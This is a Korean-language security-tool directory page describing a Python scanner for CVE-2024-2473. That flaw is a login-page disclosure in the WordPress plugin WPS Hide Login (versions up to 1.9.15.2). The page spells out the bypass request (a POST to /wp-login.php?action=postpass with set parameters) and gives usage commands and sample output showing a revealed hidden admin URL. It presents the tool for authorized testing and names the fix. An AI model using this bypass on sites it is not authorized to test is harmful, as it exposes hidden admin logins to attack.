Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-2473 — Wordpress 숨겨진 로그인 페이지 노출. WPS Hide Login ≤ 1.9.15.2 (CVE-2024-2473)을 실행하는 WordPress 사이트에서 로그인 페이지 노출을 감지합니다. | Kitploit
도구/GitHubGitHub/m4xsec/cve-2024-2473
ReconnaissanceVulnerability ScannersExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubm4xsec/cve-2024-2473

CVE-2024-2473

Wordpress 숨겨진 로그인 페이지 노출. WPS Hide Login ≤ 1.9.15.2 (CVE-2024-2473)을 실행하는 WordPress 사이트에서 로그인 페이지 노출을 감지합니다.

저장소 보기
215개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-2473 — WPS Hide Login 로그인 페이지 식별기

WPS Hide Login(≤ 1.9.15.2)을 실행하는 WordPress 사이트에서 로그인 페이지 노출(Login Page Disclosure)을 탐지하는 전문 Python 스캐너

Python CVE CVSS License Platform

Venexy 제작


목차

  • 개요
  • 취약점 세부 정보
  • 작동 방식
  • 요구 사항
  • 설치
  • 사용 방법
  • 출력 예시
  • 면책 조항
  • 참고 자료

개요

WPS Hide Login은 관리자가 기본 /wp-login.php URL을 사용자 정의 숨김 경로로 변경할 수 있게 해주는 인기 WordPress 플러그인으로, '난독화를 통한 보안(security through obscurity)' 방식으로 작동합니다.

이 스캐너는 action=postpass 매개변수를 제공하여 플러그인의 보호 메커니즘을 완전히 우회하고, 인증되지 않은 공격자에게 숨겨진 로그인 페이지 URL을 노출시킬 수 있는 취약점인 CVE-2024-2473을 탐지합니다.


취약점 세부 정보

설명

WPS Hide Login 플러그인은 WordPress 로그인 페이지를 기본 /wp-login.php에서 관리자가 선택한 사용자 정의 URL로 이동시킵니다. 그러나 1.9.15.2를 포함한 모든 이전 버전에서는 /wp-login.php 또는 /wp-admin/에 action=postpass 쿼리 매개변수를 제공하면 이 보호 기능이 우회되어 숨겨진 로그인 폼의 실제 action URL이 드러납니다. 즉, 인증되지 않은 모든 공격자에게 비밀 로그인 경로가 노출됩니다.


작동 방식

이 스캐너는 취약점의 공격 흐름을 세 단계에 걸쳐 재현합니다:

root@kitploit:~
Phase 1  ─►  Confirm target is a WordPress installation
                  │
                  ▼
Phase 2a ─►  POST /wp-login.php?action=postpass
             with body: action=lostpassword&post_password=test
             Check: HTTP 200 + lostpasswordform present + no wp-login.php in body
             Extract hidden login URL from form action attribute
                  │
Phase 2b ─►  POST /wp-admin/?action=postpass
             Check: HTTP 302 redirect to location containing reauth=1 or /login
                  │
                  ▼
             Report hidden login URL if discovered

Phase 2a 또는 Phase 2b 중 하나라도 일치하면 대상은 취약(vulnerable) 한 것으로 표시됩니다.


요구 사항

  • Python 3.7 이상
  • requests 라이브러리

설치

1. 저장소를 클론합니다

root@kitploit:~
git clone https://github.com/m4xsec/CVE-2024-2473.git
cd CVE-2024-2473

2. 의존성을 설치합니다

root@kitploit:~
pip install requests

참고: Python 가상 환경 또는 Kali Linux를 사용하는 시스템에서는 다음이 필요할 수 있습니다:

root@kitploit:~
pip install requests --break-system-packages

사용 방법

root@kitploit:~
python CVE-2024-2473.py -u <TARGET_URL> [-t TIMEOUT]

인자

인자설명기본값
-u, --url대상 WordPress 기본 URL (필수)—

예제

root@kitploit:~
# Basic scan
python CVE-2024-2473.py -u https://example.com

# Scan with custom timeout
python CVE-2024-2473.py -u https://example.com --timeout 15

# Scan over HTTP
python CVE-2024-2473.py -u http://192.168.1.100

출력 예시

root@kitploit:~
 ...

  ┌─────────────────────────────────────────────────────────────┐
  │  CVE-2024-2473  •  WPS Hide Login Page Identifier           │
  │  Coded by Venexy | https://github.com/m4xsec               │
  └─────────────────────────────────────────────────────────────┘

  ===============================================================
    TARGET    https://example.com
    TIME      2024-11-01 18:00:00
    TIMEOUT   10s
  ===============================================================

  [18:00:00] [*] Phase 1 | Fingerprinting WordPress installation ...
  [18:00:01] [+] WordPress confirmed — https://example.com

  [18:00:01] [*] Phase 2 | Testing CVE-2024-2473 bypass vectors ...

  [18:00:01] [*] Vector A | POST /wp-login.php?action=postpass
             +- Status : 200   Result : MATCH

  [18:00:02] [*] Vector B | POST /wp-admin/?action=postpass
             +- Status : 302   Result : MATCH

  ###############################################################
  ##           VULNERABILITY CONFIRMED  --  CVE-2024-2473      ##
  ###############################################################

    Plugin          WPS Hide Login <= 1.9.15.2
    Severity        Medium (CVSS 5.3 / EPSS 93rd percentile)
    CWE             CWE-200 — Exposure of Sensitive Information
    CVSS Vector     AV:N / AC:L / PR:N / UI:N / S:U / C:L / I:N / A:N

  [18:00:02] [VULN] Bypass confirmed via /wp-login.php?action=postpass

  ====================================================
        HIDDEN LOGIN URL DISCOVERED
  ====================================================

  >>  https://example.com/my-secret-admin-path/

  ====================================================

면책 조항

이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용해야 합니다.

저자는 이 도구로 인해 발생하는 오용 또는 손해에 대해 책임을 지지 않습니다. 보안 평가를 수행하기 전에 항상 대상 시스템 소유자의 명시적인 서면 허가를 받으십시오. 승인되지 않은 시스템 스캔 또는 악용은 불법이며 비윤리적입니다.

책임감 있게 사용하십시오.


참고 자료


Venexy가 ❤️를 담아 제작

이 도구가 도움이 되셨다면 저장소에 ⭐🌟🌟🌟을 남겨주세요.

도구 다운로드
필드세부 정보
CVE IDCVE-2024-2473
영향 대상WordPress용 WPS Hide Login 플러그인 ≤ 1.9.15.2
심각도중간
CVSS 점수5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
CWECWE-200 — 민감 정보 노출
EPSS 점수0.10433 (93번째 백분위수)
인증 필요없음
공급업체WPServeur
해결 방법플러그인을 1.9.15.2보다 높은 버전으로 업데이트
-t, --timeoutHTTP 요청 시간 제한(초)10
리소스링크
NVD — CVE-2024-2473https://nvd.nist.gov/vuln/detail/CVE-2024-2473
Wordfence 권고https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wps-hide-login/wps-hide-login-19152-login-page-disclosure
WPS Hide Login 플러그인https://wordpress.org/plugins/wps-hide-login/
CWE-200https://cwe.mitre.org/data/definitions/200.html
CVSS 3.1 계산기https://www.first.org/cvss/calculator/3.1